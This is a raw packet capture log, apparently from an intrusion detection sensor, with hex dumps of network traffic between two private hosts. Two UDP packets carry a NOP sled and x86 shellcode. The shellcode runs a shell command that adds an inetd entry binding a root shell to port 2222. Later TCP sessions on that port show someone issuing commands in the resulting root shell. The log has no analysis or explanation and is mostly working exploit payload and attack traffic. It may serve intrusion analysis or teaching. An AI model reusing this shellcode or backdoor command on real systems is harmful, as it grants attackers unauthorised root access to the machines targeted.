115105566 35242 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.909550 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x57 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1175 IpLen:20 DgmLen:73 DF ***AP*** Seq: 0xC9B2DA2B Ack: 0xCAAA5C1C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35244 115105566 6F 73 74 6E 61 6D 65 0A 76 69 63 74 69 6D 0A 62 ostname.victim.b 61 73 68 23 20 ash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.930082 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44548 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C1C Ack: 0xC9B2DA40 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105568 35244 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.621568 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x47 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44553 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCAAA5C1C Ack: 0xC9B2DA40 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105736 35244 71 75 69 74 0A quit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.621707 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1177 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA40 Ack: 0xCAAA5C21 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35415 115105736 71 q =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.640422 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44555 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C21 Ack: 0xC9B2DA41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105739 35415 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.640530 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x68 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1178 IpLen:20 DgmLen:90 DF ***AP*** Seq: 0xC9B2DA41 Ack: 0xCAAA5C21 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35417 115105739 75 69 74 0A 73 68 3A 20 71 75 69 74 3A 20 63 6F uit.sh: quit: co 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 0A mmand not found. 62 61 73 68 23 20 bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.660397 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44557 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C21 Ack: 0xC9B2DA67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105741 35417 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.745348 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x47 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44563 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCAAA5C21 Ack: 0xC9B2DA67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105849 35417 65 78 69 74 0A exit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.745484 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1180 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA67 Ack: 0xCAAA5C26 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35528 115105849 65 e =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.746430 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4B 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1181 IpLen:20 DgmLen:61 DF ***AP**F Seq: 0xC9B2DA68 Ack: 0xCAAA5C26 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35528 115105849 78 69 74 0A 65 78 69 74 0A xit.exit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.747199 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44564 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C26 Ack: 0xC9B2DA72 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105849 35528 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.748624 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44565 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xCAAA5C26 Ack: 0xC9B2DA72 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105849 35528 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.748648 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1182 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xC9B2DA72 Ack: 0xCAAA5C27 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35528 115105849 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:52.301233 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44567 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:57.310810 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44581 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:05.156817 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4A 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44602 IpLen:20 DgmLen:60 DF ******S* Seq: 0xCC1DCDF4 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 115107190 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:05.157018 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4A 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1189 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xCC5BFCFC Ack: 0xCC1DCDF5 Win: 0x77C4 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 36869 115107190 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:05.157797 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44604 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC1DCDF5 Ack: 0xCC5BFCFD Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107191 36869 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:05.168630 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x48 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1190 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xCC5BFCFD Ack: 0xCC1DCDF5 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 36870 115107191 62 61 73 68 23 20 bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:05.171243 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44609 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC1DCDF5 Ack: 0xCC5BFD03 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107192 36870 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:06.712645 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4A 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44617 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0xCC1DCDF5 Ack: 0xCC5BFD03 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107346 36870 77 68 6F 61 6D 69 0D 0A whoami.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:06.712690 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1191 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC5BFD03 Ack: 0xCC1DCDFD Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37024 115107346 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:06.712820 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1192 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xCC5BFD03 Ack: 0xCC1DCDFD Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37024 115107346 77 w =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:06.729857 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44619 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC1DCDFD Ack: 0xCC5BFD04 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107348 37024 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:06.729937 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x5A 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1193 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0xCC5BFD04 Ack: 0xCC1DCDFD Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37026 115107348 68 6F 61 6D 69 0A 72 6F 6F 74 0A 62 61 73 68 23 hoami.root.bash# 20 0A 62 61 73 68 23 20 .bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:06.749998 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44621 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC1DCDFD Ack: 0xCC5BFD1C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107350 37026 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:08.013534 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x48 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44627 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xCC1DCDFD Ack: 0xCC5BFD1C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107475 37026 71 75 69 74 0D 0A quit.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:08.013648 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1195 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xCC5BFD1C Ack: 0xCC1DCE03 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37154 115107475 71 q =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:08.030262 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44630 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC1DCE03 Ack: 0xCC5BFD1D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107478 37154 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:08.030363 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x6F 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1196 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0xCC5BFD1D Ack: 0xCC1DCE03 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37156 115107478 75 69 74 0A 73 68 3A 20 71 75 69 74 3A 20 63 6F uit.sh: quit: co 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 0A mmand not found. 62 61 73 68 23 20 0A 62 61 73 68 23 20 bash# .bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:08.050561 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44632 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCC1DCE03 Ack: 0xCC5BFD4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107480 37156 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:09.175488 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x48 192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44637 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xCC1DCE03 Ack: 0xCC5BFD4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115107592 37156 65 78 69 74 0D 0A exit.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:09.175694 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1197 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xCC5BFD4A Ack: 0xCC1DCE09 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37271 115107592 65 e =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:09.176506 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1198 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0xCC5BFD54 Ack: 0xCC1DCE09 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 37271 115107592 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:59:09.374075 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 